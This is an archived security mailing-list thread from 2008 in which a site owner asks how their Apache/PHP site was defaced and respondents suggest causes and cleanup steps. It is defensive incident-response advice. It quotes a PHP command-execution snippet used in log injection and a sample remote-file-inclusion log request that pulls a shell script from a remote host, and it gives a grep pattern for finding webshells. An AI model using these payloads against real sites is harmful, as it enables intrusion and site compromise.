Hacked by aLpTurkTegin, help patching this hole

Our website was defaced by aLpTurkTegin.  We are running apache, php ect.  Does anyone know how this hacker is getting in and what I can do to prevent this?

Our main web directory had all but one file deleted and hackedIndex.php, a.asp(a 0 byte file) and trustscn_put_test2 were placed into the main directory.  The fact that the webserver served hackedindex.php makes me think its a apache web server flaw.

Any comments, suggestions?
Thanks, -D

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 20 May 2008, Mifa wrote:

Not enough information is provided to yield an accurate assessment.  For
example, the PHP version, Apache version, other services running on the
system, permissions of the affected directory, whether the site is
vhosted, et cetera).  With that in mind, it's anyone's guess and the best
response you're going to get is a shot in the dark.  Moreover, just
because your web content was affected doesn't necessarily mean that the
web server is at fault.

My $0.02: the intruder exploited a common flaw in one of your PHP scripts.
PHP, for all its ease of use, has a habit of being the weakest link in a
lot of web sites.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (TreacherOS)
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iD8DBQFINF8W5uViX8vEG7URAjUdAJ9wG1GdDf9fmw5OYwTJby7Xe1qWlQCfYknh
+H4GMqSBuYIk5Yx+Wk0JSjU=
=zKjC
-----END PGP SIGNATURE-----

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------

Could be any of the following...

1) If co-hosted any of the other sites could have been compromised.
2) Writeable dir anywhere
3) SQL injected shell
4) Exploitable script/program
5) Missing patches
6) Easily cracked user/pass/service account
7) Misconfiguration in just about anything
8) About 100000 other things.


You must be more specific. Provide logs, patch level, version levels,
scripts used, check dir permissions, state type of hosting etc.......



----- Original Message -----
From: "Mifa" <mifa@...>
To: <pen-test@...>
Sent: Tuesday, May 20, 2008 8:46 AM
Subject: Hacked by aLpTurkTegin, help patching this hole



------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------

one would think it was your php application that was the vector of attack
hint: google "your-php-app"+exploit or "your-php-app"+vulnerability

have fun

----- Original Message -----
> Our website was defaced by aLpTurkTegin.
>  We are running apache, php ect.


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------

Hi,

Well, when using, php apps, its common to find flaws related to what
is called LFI (Local File Inclusion), there are a lot of cases in
phpmyadmin, mambo, joomla, so on, also if you have your own
applications written in php you should try to avoid this.

There are a lot of flaws related to PHP, and as i mentioned if you
have LFI bugs, its almost a fact that your site will be hacked.
Try to see in your error_log from apache if there is php code inserted
into it. its common to insert things like <?
stripslashes(passthru($cmd)) ?> to bypass magic_quotes_gpc

But, the best thing to do is to analyze your sites with some tools
like Acunetix, nikto, code review  and patch all bugs founded.

Hope this helps.


On Tue, May 20, 2008 at 7:46 AM, Mifa <mifa@...> wrote:


--
Danux, CISSP, OSCP, ISO27001
Offensive Security Consultant
Macula Security Consulting Group
www.macula-group.com

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------

What user ownership was the hacked files, the user account, or the webserver?

In my experience if it was the user account, then there was a weak
password and it was bruteforced. Check the ftp logs for file uploads
for that user account.

If it was owned by the webserver, then there is probably an
exploitable php code on the site and usually it is due to a remote
file inclusion.
Check the apache domlogs, you might get lucky and find something.
RFI  entries  often look sometihng like:

 69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc
.php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt??
HTTP/1.1" 200 - "-"

In that above example, the php file "settings.inc.php" is vulnerable
and allows for the code in a  php file on a remote server
(example.remoteserver.com) to be included (cmd.txt). Many times the
remote file will be a phpshell.

Of course this is just an example, you'd have to find what is being
exploited by what the others have suggested...

Sorry, This is kinda long winded and pretty much what everyone else
said, but I  have to deal with annoying defacement of sites everyday.
People that do that really bug me, plus i'm bored right now. :)

One HUGE help would be to make sure you have mod_security installed
and a decent modsec ruleset. That will prevent alot of naughtyness
from happening.

I like to check also for perl procs running as the webserver id,
worldwritable directories, and phpshells located in user accounts.

find /home/useraccountname/public_html/ -type d -perm 777

will locate insecure directories.

The following oneliner will find many common phpshells:

find /home/*/public_html -type f -print0 | xargs -0 egrep
'(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)'

it may take quite a while to complete depending on how many files
there are on the server.

My money is on an outdated php CMS/forum like phpbb, etc.. like
everyone else mentioned...

On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa@...> wrote:
------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes
in Securing Web Applications  
Find out now! Get Webinar Recording and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------